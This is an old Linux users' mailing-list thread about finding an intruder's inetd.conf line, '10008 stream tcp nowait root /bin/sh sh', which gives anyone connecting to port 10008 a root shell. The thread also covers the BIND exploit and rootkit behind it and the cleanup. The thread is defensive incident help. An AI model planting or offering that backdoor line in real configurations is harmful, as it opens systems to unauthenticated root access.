RE: [plug] inetd

dwen Tue, 22 May 2001 21:57:51 -0700



 it was bind + tOrn ROOTkit exploit, before april 1 i was using bind
8.2.2-P5 and the fookin WORM got me.

I did ugrade BIND and reinstalled  some packages like inetd,
net-tools...etc. to totally erased all trojan files.



thanks,
dwen



On Tue, 22 May 2001, philip morales wrote:

> " # 10008 stream tcp nowait root /bin/sh sh "
> if the you telnet to your box at port 10008
> you get instant access hehehe. not unless you got your
> firewall up and running, or unless someone flushd that
> firewall
> --- Michael Vincent Pozon <[EMAIL PROTECTED]> wrote:
> > dwen,
> > you can remove that line and lookup for updated
> > versions for any services
> > you are running on your system.
> >
> > i think that's an inetd feature, but in order to
> > write to /etc/inetd.conf ,
> > a user must have write access to /etc/inetd.conf
> > which is normally the root.
> > Someone probably exploit your system and got root
> > access them added that
> > line to /etc/inetd.conf as his backdoor.
> >
> > Regards,
> > Michael Vincent Pozon
> > - CIS/CNO/CNI
> > Tel # (+65) 7806569
> > Pager # 95493318
> > Mobile/Text # (+65) 94750962
> >
> >
> > # -----Original Message-----
> > # From: dwen [mailto:[EMAIL PROTECTED]]
> > # Sent: Tuesday, May 22, 2001 2:39 PM
> > # To: [EMAIL PROTECTED]
> > # Subject: [plug] inetd
> > #
> > # file: /etc/inetd.conf
> > # i have this line :
> > #
> > # 10008 stream tcp nowait root /bin/sh sh
> > #
> > # what will it do ?
> > #
> > #
> > # thanks,
> > # dwen
> > _
> > Philippine Linux Users Group. Web site and archives
> > at http://plug.linux.org.ph
> > To leave: send "unsubscribe" in the body to
> > [EMAIL PROTECTED]
> >
> > To subscribe to the Linux Newbies' List: send
> > "subscribe" in the body to
> [EMAIL PROTECTED]
>
>
> __________________________________________________
> Do You Yahoo!?
> Yahoo! Auctions - buy the things you want at great prices
> http://auctions.yahoo.com/
> _
> Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
> To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
>
> To subscribe to the Linux Newbies' List: send "subscribe" in the body to 
>[EMAIL PROTECTED]
>


_
Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]

To subscribe to the Linux Newbies' List: send "subscribe" in the body to 
[EMAIL PROTECTED]
RE: [plug] inetd

Reply via email to
